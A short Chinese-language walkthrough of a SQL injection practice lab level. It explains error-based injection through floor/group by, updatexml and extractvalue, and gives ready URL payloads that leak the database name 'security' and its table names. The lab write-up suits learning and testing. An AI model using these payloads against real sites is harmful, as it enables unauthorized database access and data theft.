修改Id的值后发现有报错但没办法往后推进,所以这儿可能是布尔型盲注,报错盲注和时间延迟盲注了
这关有很多通关的办法,这里使用的是报错注入,直接套公式即可:
(1)floor报错: and (select 1 from (select count(*),concat((payload) from users limit 0,1),floor (rand(0)*2))x from information_schema.tables group by x)a)
原理是floor,count(), group by 三个一起使用会报错
(2)updatexml报错:and updatexml(1,payload,1)
利用xpath解析错误,再利用concat回显消息
(3)extractvalue报错:and extractvalue(1, payload)
同样是利用xpath解析错误
还有其他的,不过高版本mysql很多已经不能用了,开始通关
?id=1' union select 1,2,updatexml(1,concat(0x7e,database(),0x7e),1) --+
先用order by猜完字段数,然后报错注入回显的库名是security
?id=1' union select 1,2,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema = 'security' limit 0,1),0x7e),1) --+
再爆security的表名,这里内外层查询列数需一致,后续爆列名和查数据和前面几关相同,填入payload即可
第六关操作差不太多